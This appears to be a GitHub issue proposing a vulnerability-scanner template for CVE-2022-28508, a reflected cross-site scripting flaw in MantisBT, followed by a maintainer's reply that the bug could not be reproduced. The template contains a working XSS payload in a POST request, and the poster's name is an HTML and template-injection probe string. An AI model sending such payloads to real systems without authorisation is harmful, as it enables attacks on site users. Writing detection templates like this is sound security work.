CVE-2022-28508
akincibor opened this issue · comments
<h1>Akincibor</h1>${7*7}{{7*7}} commented
id: CVE-2022-28508
info:
name: MantisBT < 2.25.2 - Reflected Cross-Site Scripting
author: Akincibor
severity: medium
description: An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.
reference:
- https://github.com/YavuzSahbaz/CVE-2022-28508/blob/main/MantisBT%202.25.2%20XSS%20vulnurability
tags: xss
requests:
- method: POST
path:
- "{{BaseURL}}/man/browser_search_plugin.php"
body: |
type=text'"()%26%25<acx><ScRiPt%20>N8Zn(9266)</ScRiPt>
headers:
Content-Type: "application/x-www-form-urlencoded"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"()&acx><script>n8zn(9266)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
Prince Chaddha commented
Hi @akincibor, The response time to this Issue was much longer than usual. We were unable to set up a vulnerable environment for this CVE, so this PR has been put on hold. We would appreciate it if someone could provide us with the debug data or steps to set up a vulnerable environment. We would need to add an additional matcher in order to prevent False Positive results.
Also, Feel free to join the discord server if you have more info that you can share directly over DM.